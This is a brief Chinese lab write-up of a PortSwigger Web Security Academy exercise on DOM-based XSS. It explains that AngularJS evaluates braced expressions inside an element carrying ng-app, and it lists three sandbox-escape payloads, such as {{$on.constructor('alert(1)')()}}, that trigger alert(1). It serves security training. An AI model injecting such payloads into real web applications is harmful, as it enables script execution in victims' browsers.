Portswigger-web-security-academy:dom-base_xss
2021-02-18 10:18
阅读:390
-
题目描述
这道题用到了
AngularJS,涉及到一个知识点当标签有
ng-app属性时,会运行花括号里的代码,{{alert()}} 要求运行一个``AngularJS
的表达式调用alert` -
解题步骤
看了两篇AngularJS xss的介绍,里面有两个payload,可行,原理都一样,建议看第一个参考链接的介绍
payload:
{{constructor.constructor(‘alert(1)‘)()}}{{x = {‘y‘:‘‘.constructor.prototype}; x[‘y‘].charAt=[].join;$eval(‘x=alert(1)‘);}}官方solution的payload:
{{$on.constructor(‘alert(1)‘)()}} -
参考
https://bbs.pediy.com/thread-258994.htm
https://blog.csdn.net/linuxnews/article/details/58296374
文章来自:搜素材网的编程语言模块,转载请注明文章出处。
文章标题:Portswigger-web-security-academy:dom-base_xss
文章链接:http://soscw.com/index.php/essay/57003.html
文章标题:Portswigger-web-security-academy:dom-base_xss
文章链接:http://soscw.com/index.php/essay/57003.html
评论
亲,登录后才可以留言!